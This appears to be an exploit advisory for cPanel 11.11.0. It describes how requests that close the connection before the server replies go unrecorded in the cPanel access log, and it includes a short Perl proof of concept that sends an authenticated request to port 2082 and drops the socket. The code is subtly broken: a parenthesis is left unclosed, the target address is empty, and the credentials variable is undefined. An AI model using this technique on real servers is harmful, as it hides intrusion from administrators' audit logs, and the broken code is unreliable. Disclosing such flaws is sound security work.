cPanel 11.11.0-STABLE_16999 - bypass cPanel and WHM logging


If a user made a request to cPanel or WHM, then immediately closed the connection without waiting for a response, the request would not be logged to the cPanel access log at /usr/local/cpanel/logs/access_log. Other logging appeared to remain fully functional, such as anything that would normally be written to the cPanel error_log, or to /var/log/secure (such as when the cpwrap applications were executed).


use strict;
use warnings;
use IO::Socket::INET;

my $request = "GET /frontend/x3/index.html HTTP/1.1\r\n";
$request   .= "Host: localhost:2082\r\n";
$request   .= "Authorization: Basic $base64_creds\r\n\r\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => '',
    PeerPort => '2082',
    Proto    => 'tcp',
    Timeout  => '3',

print $sock $request;
close $sock;


Users could issue requests to cpsrvd that could go partially or entirely unlogged.